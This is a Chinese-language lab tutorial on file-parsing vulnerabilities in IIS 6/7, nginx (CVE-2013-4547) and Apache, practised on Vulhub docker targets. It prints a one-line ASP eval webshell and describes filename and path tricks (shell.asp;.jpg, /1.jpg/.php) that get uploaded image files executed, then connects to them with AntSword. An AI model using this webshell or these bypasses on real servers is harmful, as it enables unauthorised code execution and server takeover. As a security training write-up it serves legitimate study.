IIS解析漏洞
IIS6.X
#环境
Windows Server 2003
在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行
在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码
<%=now()%>
#asp一句话
<%eval request("h")%>
单独创建一个1.jpg发现并不能解析
在a.asp下被解析
在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是
shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx
IIS7.X
在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个文件路径/xx.jpg
后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。
php.ini里的cgi.fix_pathinfo=1 开启
IIS7在Fast-CGI运行模式下
#环境
PHPstudy for IIS
配置 php.ini 文件,将 cgi.fix_pathinfo=1 注释取消掉;并重启
IIS -->配置网站-->处理程序映射-->PHPStudy_FastCGI -->请求限制 -->取消勾
然后在网站下创建我们的shell;并命名为1.jpg
去网站访问他
加上/.php就可以被解析为php文件
蚁剑连接一下
nginx解析漏洞
靶场安装
docker
查看docker容器是否安装,若未安装,执行下面的命令
yum install docker
yum install docker-compose
docker -v
docker-compose -v
yum install git
git clone https://github.com/vulhub/vulhub.git
ls
cd vulhub/
1.Vulhub靶场nginx_parsing
我们可以发现里面有很多靶场,找到我们需要的nginx靶场环境
cd nginx/
ls
选择这一关进入
cd nginx_parsing_vulnerability/
docker-compose up -d
docker ps
这样就可以看到这一关的端口号为:80,浏览器访问
写一个图片马
2.Vulhub靶场CVE-2013-4547
我们可以发现里面有很多靶场,找到我们需要的nginx靶场环境
cd nginx/
ls
选择这一关进入
cd CVE-2013-4547/
docker-compose up -d
docker ps
这样就可以看到这一关的端口号为:8080,浏览器访问
修改为00,然后放行
Apache解析漏洞
1.Vulhub靶场apache_parsing_vulnerability
我们可以发现里面有很多靶场,找到我们需要的靶场环境
cd vulhub/
cd httpd/
ls
选择这一关进入
cd apache_parsing_vulnerability/
docker-compose up -d
docker ps
这样就可以看到这一关的端口号为:8080,浏览器访问
警告不用搭理
用蚁剑连接